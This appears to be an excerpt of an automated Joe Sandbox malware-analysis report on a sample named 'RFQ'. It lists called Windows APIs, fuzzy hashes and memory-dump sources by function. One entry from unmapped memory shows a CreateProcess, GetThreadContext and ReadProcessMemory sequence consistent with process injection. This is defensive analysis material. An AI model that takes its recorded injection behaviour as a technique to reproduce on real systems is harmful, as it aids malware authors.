                                                                            • Opcode Fuzzy Hash: 60bfbf194dc293e722f69f8e1d56b176d46112550bc1528d506d1d00cd06b7c4
                                                                            • Instruction Fuzzy Hash: C131E171408310AEC360FB20DC55BEB77D9AB40711F108A2EF59683191DFB49A49CBDA
                                                                            APIs
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 006A05E8
                                                                              • Part of subcall function 006A3234: RaiseException.KERNEL32(?,?,?,006A060A,?,00000001,?,?,?,?,?,?,006A060A,?,00748748), ref: 006A3294
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 006A0605
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                            • String ID: Unknown exception
                                                                            • API String ID: 3476068407-410509341
                                                                            • Opcode ID: 26555256e34c8aedf53fd4cf6a0ff73c1c03ef64d43c411857b04c9db94ff2fe
                                                                            • Instruction ID: e8cb809a551ffad876de615f6892bf761272e7da8b1593fa685042b61ade4033
                                                                            • Opcode Fuzzy Hash: 26555256e34c8aedf53fd4cf6a0ff73c1c03ef64d43c411857b04c9db94ff2fe
                                                                            • Instruction Fuzzy Hash: EAF0222090020C778F40BBA8EC46DDEB76E5E02300B604038B824D29A2EF71EF5A8DC5
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 0070821C
                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00708223
                                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 00708404
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentFreeLibraryTerminate
                                                                            • String ID:
                                                                            • API String ID: 146820519-0
                                                                            • Opcode ID: 84d5856b0d00dd1436bc53e00b6dbab6517d557631cc5e8b5db9375040cc7daa
                                                                            • Instruction ID: 975328ae58fe7e70a464693cabd006e203925d846f755ffb090c6dbc97963b4f
                                                                            • Opcode Fuzzy Hash: 84d5856b0d00dd1436bc53e00b6dbab6517d557631cc5e8b5db9375040cc7daa
                                                                            • Instruction Fuzzy Hash: FE127C71A08341DFC754DF28C484B2ABBE5FF85314F048A5DE8898B392DB75E946CB92
                                                                            APIs
                                                                              • Part of subcall function 006834CE: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006834FF
                                                                              • Part of subcall function 006834CE: MapVirtualKeyW.USER32(00000010,00000000), ref: 00683507
                                                                              • Part of subcall function 006834CE: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00683512
                                                                              • Part of subcall function 006834CE: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0068351D
                                                                              • Part of subcall function 006834CE: MapVirtualKeyW.USER32(00000011,00000000), ref: 00683525
                                                                              • Part of subcall function 006834CE: MapVirtualKeyW.USER32(00000012,00000000), ref: 0068352D
                                                                              • Part of subcall function 00683455: RegisterWindowMessageW.USER32(00000004,?,00682BCF), ref: 006834AD
                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00682C75
                                                                            • OleInitialize.OLE32 ref: 00682C93
                                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 006C3037
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                            • String ID:
                                                                            • API String ID: 1986988660-0
                                                                            • Opcode ID: 0c4fa14b2f64e4a3aac09f2199893d16321391e8fcc9a9fd5243876315b6bc52
                                                                            • Instruction ID: 02d9838a7bb222e1f1e52d5c3a86e297a1b2fbe49951a7e0b801aa43bd7c74dc
                                                                            • Opcode Fuzzy Hash: 0c4fa14b2f64e4a3aac09f2199893d16321391e8fcc9a9fd5243876315b6bc52
                                                                            • Instruction Fuzzy Hash: FD71D9B49003408EC785EFA9A8457D53BE1AB883577C0C62E941AC73A1FBBC59A4CF5C
                                                                            APIs
                                                                            • CloseHandle.KERNELBASE(00000000,00000000,?,?,006B856C,?,00748CD8,0000000C), ref: 006B86A4
                                                                            • GetLastError.KERNEL32(?,006B856C,?,00748CD8,0000000C), ref: 006B86AE
                                                                            • __dosmaperr.LIBCMT ref: 006B86D9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                            • String ID:
                                                                            • API String ID: 2583163307-0
                                                                            • Opcode ID: 662cb88f8c259e63ac7912bd7a5b403a348bc1dfcfab1c09e11fbd2047f3f888
                                                                            • Instruction ID: 850cca9f2688d46ffd067e3ac9b2b250d2e3a4183aef126489da404ddbe11bda
                                                                            • Opcode Fuzzy Hash: 662cb88f8c259e63ac7912bd7a5b403a348bc1dfcfab1c09e11fbd2047f3f888
                                                                            • Instruction Fuzzy Hash: 3A010CB35046501ED2A53374A846BED674F4B92734F29411DF9198B3D2FEA48CC1C395
                                                                            APIs
                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 006C386E
                                                                              • Part of subcall function 0068592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00685922,?,?,006848AA,?,?,?,00000000), ref: 0068594D
                                                                              • Part of subcall function 006847D0: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006847EF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Name$Path$FileFullLongOpen
                                                                            • String ID: X
                                                                            • API String ID: 779396738-3081909835
                                                                            • Opcode ID: 50be70e11e43daf10d71ab10f8dea6de40447c37fac0d4e5f3a796ded04ab5c9
                                                                            • Instruction ID: 4f276aab42d6bf82f08bdc99f3bb735b486c1f031e08fbc584e069376c020c42
                                                                            • Opcode Fuzzy Hash: 50be70e11e43daf10d71ab10f8dea6de40447c37fac0d4e5f3a796ded04ab5c9
                                                                            • Instruction Fuzzy Hash: DE219671A002989FDF41EF98D805BEE7BFA9F49314F00805DE415A7241DBB89A89CF65
                                                                            APIs
                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00685793
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_
                                                                            • String ID:
                                                                            • API String ID: 1144537725-0
                                                                            • Opcode ID: 38a5dca3cf41b3560040cf9ac54f8e6d30550fa3a118bdfc5fc54794508b14a5
                                                                            • Instruction ID: ec68280d5eaef454a48f9438989f2f8e6a8b874f651a4aff80a4ecea3267e980
                                                                            • Opcode Fuzzy Hash: 38a5dca3cf41b3560040cf9ac54f8e6d30550fa3a118bdfc5fc54794508b14a5
                                                                            • Instruction Fuzzy Hash: 2B318170504701CFD361EF24D8947D7BBF9FB48319F008A2EE59A83240E7B5A944CB5A
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0068AE0C,?,00008000), ref: 00687113
                                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0068AE0C,?,00008000), ref: 006C4BFF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 516aa1522b942296bdd04836d56f7be39d07797cf154b67ade140803131dee58
                                                                            • Instruction ID: c6ea7bff5dcdcf0092afaf16485e69e1d1cb25c607718cebbfd544fe369dafaa
                                                                            • Opcode Fuzzy Hash: 516aa1522b942296bdd04836d56f7be39d07797cf154b67ade140803131dee58
                                                                            • Instruction Fuzzy Hash: B8019230285225B6E3315A6ACC0EFE77F99EF02774F24C304BA985E1E0CBB49855CB90
                                                                            APIs
                                                                            • IsThemeActive.UXTHEME ref: 006836AD
                                                                              • Part of subcall function 00683656: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 0068366B
                                                                              • Part of subcall function 00683656: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00683682
                                                                              • Part of subcall function 0068445D: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,006836D8,?), ref: 0068448D
                                                                              • Part of subcall function 0068445D: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,006836D8,?), ref: 006844A0
                                                                              • Part of subcall function 0068445D: GetFullPathNameW.KERNEL32(00007FFF,?,?,00751418,00751400,?,?,?,?,?,?,006836D8,?), ref: 00684515
                                                                              • Part of subcall function 0068445D: SetCurrentDirectoryW.KERNEL32(?,00000001,00751418,?,?,?,?,?,?,?,006836D8,?), ref: 00684596
                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 006836E7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                            • String ID:
                                                                            • API String ID: 1550534281-0
                                                                            • Opcode ID: ec132d5df82abf311b3603606b7ab032ceb0818bbab7635aca8e886bb077c2d0
                                                                            • Instruction ID: 9e07d436a25d6a9aef681ad88197bd3c02019c3c2c2835d24e96b5182b274031
                                                                            • Opcode Fuzzy Hash: ec132d5df82abf311b3603606b7ab032ceb0818bbab7635aca8e886bb077c2d0
                                                                            • Instruction Fuzzy Hash: 4CF06731544344AFE301ABA8EC2ABA53B96A700B07F40C519F104496E2EBFA94908B4C
                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 01716B33
                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01716BC9
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01716BEB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1676907307.0000000001715000.00000040.00000020.00020000.00000000.sdmp, Offset: 01715000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1715000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 2438371351-0
                                                                            • Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                                                            • Instruction ID: 9500e9cec9fdec0f7cd07ac8db621c9ac3b9586dc68ff2ed080e964a59d26dc8
                                                                            • Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                                                            • Instruction Fuzzy Hash: A312BC24A24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F85CB5A
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: InputState
                                                                            • String ID:
                                                                            • API String ID: 860304643-0
                                                                            • Opcode ID: 50089e77774bb8b3ed3386f7821277a28028824b4f915f46641f8168d4a8005e
                                                                            • Instruction ID: ef75c69bf8f71e49eec1249cdd79a4024fcc6755ac4fd904f37156456c10a39c
                                                                            • Opcode Fuzzy Hash: 50089e77774bb8b3ed3386f7821277a28028824b4f915f46641f8168d4a8005e
                                                                            • Instruction Fuzzy Hash: 5E51D0719047429FDB39DF14C4547E6BBE2BB55315F04863EE46883361D3B4A994CF82
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                            • Instruction ID: 2c07bd4a91162146daba7fd56ae1f119aa8f3dd98f07f696625648248872fd26
                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                            • Instruction Fuzzy Hash: 4631E870A00109DBCB18DF58D4849AAF7AAFF49310B66C6A5E809CBB55D731EDC2DBC0
                                                                            APIs
                                                                              • Part of subcall function 00686832: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0068687F,?,00751418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 0068683E
                                                                              • Part of subcall function 00686832: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00686850
                                                                              • Part of subcall function 00686832: FreeLibrary.KERNEL32(00000000,?,?,0068687F,?,00751418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00686862
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00751418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 0068689F
                                                                              • Part of subcall function 006867FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,006C488B,?,00751418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00686804
                                                                              • Part of subcall function 006867FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00686816
                                                                              • Part of subcall function 006867FB: FreeLibrary.KERNEL32(00000000,?,?,006C488B,?,00751418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00686829
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Library$Load$AddressFreeProc
                                                                            • String ID:
                                                                            • API String ID: 2632591731-0
                                                                            • Opcode ID: e465a847645bf24670a2675cd3b76f54af74b1b995cb6a231b9655d03b681837
                                                                            • Instruction ID: c8f4fd587b07fd61eb5d83106caa828ffc493bdbfd77a31d0da9ca148d8bbf45
                                                                            • Opcode Fuzzy Hash: e465a847645bf24670a2675cd3b76f54af74b1b995cb6a231b9655d03b681837
                                                                            • Instruction Fuzzy Hash: 08112372600205AACB24FB64C812FAD77A39F54710F20852EF586A71C1EEB59A069BA4
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: __wsopen_s
                                                                            • String ID:
                                                                            • API String ID: 3347428461-0
                                                                            • Opcode ID: 36157c45ac9ee546d023c11a1b124e21131d1578e1d067293e4049d0438c66f9
                                                                            • Instruction ID: 6fa3c6d5b3e527cdb29a9cef7c758b9648750a73e67dafd5c5f68a9e8185d132
                                                                            • Opcode Fuzzy Hash: 36157c45ac9ee546d023c11a1b124e21131d1578e1d067293e4049d0438c66f9
                                                                            • Instruction Fuzzy Hash: 2E1118B190420AAFCF05DF98E9459DA7BF9FF48310F104459F808AB312DB31DA21CBA5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
APIs
Memory Dump Source
• Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
Similarity
• API ID: _wcslen
• String ID:
• API String ID: 176396367-0
APIs
• RtlAllocateHeap.NTDLL(00000000,?,00000001,?,0069FD75,?,?,0068B63D,00000000,?,?,?,006F106C,0071D0D0,?,006C242E), ref: 006B37E2
Memory Dump Source
• Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• FreeLibrary.KERNEL32(?,?,00751418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 0068690F
Memory Dump Source
• Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,006CFA27,00743650,00000002), ref: 006ECC44
  • Part of subcall function 006ECB55: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,006ECC37,?,?,?), ref: 006ECB77
  • Part of subcall function 006ECB55: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,006ECC37,?,?,?,?,006CFA27,00743650,00000002), ref: 006ECB8C
  • Part of subcall function 006ECB55: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,006ECC37,?,?,?,?,006CFA27,00743650,00000002), ref: 006ECB98
Memory Dump Source
• Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
Similarity
• API ID: File$Pointer$Write
• String ID:
• API String ID: 3847668363-0
APIs
• GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006847EF
  • Part of subcall function 006884E7: _wcslen.LIBCMT ref: 006884FA
Memory Dump Source
• Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
Similarity
• API ID: LongNamePath_wcslen
• String ID:
• API String ID: 541455249-0
APIs
• CreateFileW.KERNELBASE(00000000,00000000,?,006C06A5,?,?,00000000,?,006C06A5,00000000,0000000C), ref: 006C0358
Memory Dump Source
• Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
